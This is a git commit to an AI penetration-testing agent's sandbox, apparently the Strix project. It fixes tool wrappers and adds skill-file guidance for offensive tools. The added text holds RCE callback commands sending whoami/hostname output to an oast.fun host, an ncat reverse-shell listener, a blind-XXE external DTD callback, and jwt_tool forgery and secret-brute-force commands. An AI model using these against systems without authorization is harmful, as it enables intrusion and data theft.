Surface the previously-undocumented sandbox tools and unbreak two of them

The image ships 15 tools (jwt_tool, interactsh-client, arjun, dirsearch,
gospider, wafw00f, retire, eslint, jshint, js-beautify, JS-Snooper,
jsniper.sh, vulnx, ncat, uv) that the always-loaded skills never name
with usage guidance — agents could discover them via the environment
catalog but had no when/how. Add concise mentions in the natural home
for each: jwt_tool in the JWT skill, interactsh-client in the OAST
sections of SSRF/XXE/RCE, arjun in IDOR recon, dirsearch as the broad
alternate in the ffuf skill, gospider + the JS scrapers in katana,
wafw00f next to httpx, retire/eslint/jshint/js-beautify as a new
JavaScript-Side Coverage block in the SAST playbook, uv in python,
vulnx in the deep scan-mode CVE bullet, ncat in a new RCE Tooling
block.

Audit also turned up three real breakages along the way:

- jwt_tool's shebang resolves to /usr/bin/python3 but its dependencies
  live in /app/.venv, so every invocation died with
  ModuleNotFoundError: ratelimit. Replace the bare symlink with a
  wrapper that execs /app/.venv/bin/python against the real script.
- dirsearch's pipx venv ended up with setuptools 82, which dropped
  pkg_resources — startup failed before parsing args. Pin the inject
  to setuptools<81.
- ESLint's --no-eslintrc flag was removed in v9; the surviving
  --no-config-lookup covers it. Drop the dead flag from the SAST
  command block.

Also corrected the JS-Snooper / jsniper.sh entry in katana.md — both
take a bare domain and run their own JS discovery internally, not the
JS URLs Katana already harvested.
This commit is contained in:
0xallam
2026-05-25 22:02:15 -07:00
parent c88b2bbb99
commit 8ed5311b8e
12 changed files with 91 additions and 5 deletions
+6 -2
View File
@@ -75,7 +75,7 @@ RUN nuclei -update-templates
RUN pipx install arjun && \
pipx install dirsearch && \
pipx inject dirsearch setuptools && \
pipx inject dirsearch 'setuptools<81' && \
pipx install wafw00f
ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
@@ -193,7 +193,11 @@ USER pentester
RUN python3 -m venv /app/.venv && \
/app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \
/app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \
ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool
printf '%s\n' \
'#!/bin/bash' \
'exec /app/.venv/bin/python /home/pentester/tools/jwt_tool/jwt_tool.py "$@"' \
> /home/pentester/.local/bin/jwt_tool && \
chmod +x /home/pentester/.local/bin/jwt_tool
COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py
ENV PYTHONPATH=/opt/strix-python
+17
View File
@@ -121,6 +121,23 @@ trivy fs --scanners vuln,misconfig --timeout 30m --offline-scan \
--format json --output /workspace/.strix-source-aware/trivy-fs.json . || true
```
## JavaScript-Side Coverage
For frontends and Node services, layer these on top of the language-agnostic
passes above:
```bash
retire --path . --outputformat json --outputpath /workspace/.strix-source-aware/retire.json || true
eslint --no-config-lookup --rule '{"no-eval":2,"no-implied-eval":2}' \
-f json -o /workspace/.strix-source-aware/eslint.json . || true
```
When you hit a minified bundle, run `js-beautify <file>` for a readable
view before greppping — and use `jshint --reporter=unix <file>` as a
lighter syntax/anti-pattern check when ESLint is over-eager. The
`JS-Snooper` / `jsniper.sh` tools (in `katana.md`) are the right next
step to mine those bundles for endpoint candidates.
## Converting Static Signals Into Exploits
1. Rank candidates by impact and exploitability.
+2
View File
@@ -30,6 +30,8 @@ Thorough understanding before exploitation. Test every parameter, every endpoint
- Review file handling: upload, download, processing
- Understand the deployment model and infrastructure assumptions
- Check all dependency versions and repository risks against CVE/misconfiguration data
- For quick CVE lookups on a named product/version, use `vulnx search <query>`
(ProjectDiscovery's CVE database) before falling back to web_search
**Blackbox (no source)**
- Exhaustive subdomain enumeration with multiple sources and tools
+6
View File
@@ -64,3 +64,9 @@ Failure recovery:
If uncertain, query web_search with:
`site:github.com/ffuf/ffuf <flag> README`
Alternate tool for path/file enumeration: `dirsearch -u <url> -e php,html,js,json`
ships with curated wordlists, sane defaults, and built-in recursion. Reach
for ffuf when you need surgical fuzzing of any input position (header,
body, vhost) or precise filter control; reach for dirsearch for a quick
broad sweep with no setup.
+5
View File
@@ -75,3 +75,8 @@ Failure recovery:
If uncertain, query web_search with:
`site:docs.projectdiscovery.io httpx <flag> usage`
Companion: `wafw00f <url>` fingerprints the WAF/CDN in front of a target
(Cloudflare, Akamai, AWS WAF, etc.). Run it once after httpx confirms the
host is live — the WAF identity decides whether to throttle fuzzing,
swap to evasion payload sets, or assume blocking and route differently.
+11
View File
@@ -74,3 +74,14 @@ Failure recovery:
If uncertain, query web_search with:
`site:docs.projectdiscovery.io katana <flag> usage`
Complementary crawlers / JS endpoint extractors in the sandbox:
- `gospider -s https://target.tld -d 3 -c 10 -t 20` — alternate crawler;
picks up things Katana misses on weird sites; use it as a second
pass when Katana output looks thin.
- `~/tools/JS-Snooper/js_snooper.sh <domain>` and
`~/tools/jsniper.sh/jsniper.sh <domain>` — both take a bare domain and
run their own JS-file discovery internally (jsniper drives httpx +
katana + nuclei file templates). Reach for them when you want a quick
"find endpoints/keys/secrets in any JS this domain serves" sweep
without wiring it up yourself.
+10
View File
@@ -88,3 +88,13 @@ For iterative exploit work, put code in a file:
2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`.
3. Edit and rerun until the proof-of-concept is reliable.
```
## Installing extra packages
The sandbox's Python lives in `/app/.venv`. To add a one-off dependency
for an exploit script, use `uv` (already in the image and much faster
than pip):
```bash
uv pip install --python /app/.venv/bin/python <package>
```
@@ -151,6 +151,16 @@ JWT/OIDC failures often enable token forgery, token confusion, cross-service acc
9. Favor minimal PoCs that clearly show cross-context acceptance and durable access
10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each
## Tooling
- `jwt_tool -t <url> -rh "Authorization: Bearer <token>" -M at` runs the
full attack matrix (alg=none, RS→HS confusion, kid injection, claim
edits) and reports which mutations the server still accepts.
- `jwt_tool <token> -C -d <wordlist>` brute-forces HMAC secrets when an
HS-family signature is in use.
- Use `jwt_tool` to mint a token under a key you control once you find an
acceptance path (kid/jku/x5u/jwk), then replay via `repeat_request`.
## Summary
Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.
+3
View File
@@ -47,6 +47,9 @@ Object-level authorization failures (BOLA/IDOR) lead to cross-account data expos
**Parameter Analysis**
- Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state)
- Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation
- Find undocumented params with `arjun -u <url>` (GET) or `arjun -u <url> -m POST`
surfaces hidden filters like `?include_deleted=1`, `?as_user=…`, `?owner_id=…`
that frequently widen the IDOR surface.
**Enumeration Techniques**
- Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars
+13 -2
View File
@@ -41,14 +41,18 @@ Remote code execution leads to full server control when input reaches code execu
### OAST
Use `interactsh-client -v` in the sandbox to mint a unique callback
domain (`*.oast.fun`); substitute it for `attacker.tld` below. Each
invocation prints inbound DNS/HTTP hits to stdout in real time.
**DNS**
```bash
nslookup $(whoami).x.attacker.tld
nslookup $(whoami).xyz.oast.fun
```
**HTTP**
```bash
curl https://attacker.tld/$(hostname)
curl https://xyz.oast.fun/$(hostname)
```
### Output-Based
@@ -233,6 +237,13 @@ pop graphic-context
6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies
7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops
## Tooling
- Reverse-shell listener: `ncat -lvnp 4444` (in the sandbox; `ncat` is the
netcat variant that ships in the image). Pair with a one-shot shell
payload only when OAST + selective reads are insufficient — never
drop a persistent shell when a single targeted command will prove it.
## Summary
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.
+5 -1
View File
@@ -123,7 +123,11 @@ Server-Side Request Forgery enables the server to reach networks and services th
## Blind SSRF
- Use OAST (DNS/HTTP) to confirm egress
- Use OAST (DNS/HTTP) to confirm egress. `interactsh-client -v` (running
in the sandbox) gives you a unique `*.oast.fun` domain; embed it in
the URL parameter and watch the interactsh stdout for the inbound
DNS/HTTP hit. Each invocation yields a fresh domain — restart between
payloads if you need to correlate hits to a specific request.
- Derive internal reachability from timing, response size, TLS errors, and ETag differences
- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
+3
View File
@@ -49,6 +49,9 @@ XML External Entity injection is a parser-level failure that enables local file
- Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks
- Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens)
- Use `interactsh-client -v` for the callback domain. Reference it as the
external DTD host (e.g. `<!ENTITY % ex SYSTEM "http://xyz.oast.fun/x.dtd">`)
and read the DNS/HTTP hit on the interactsh stdout.
### Timing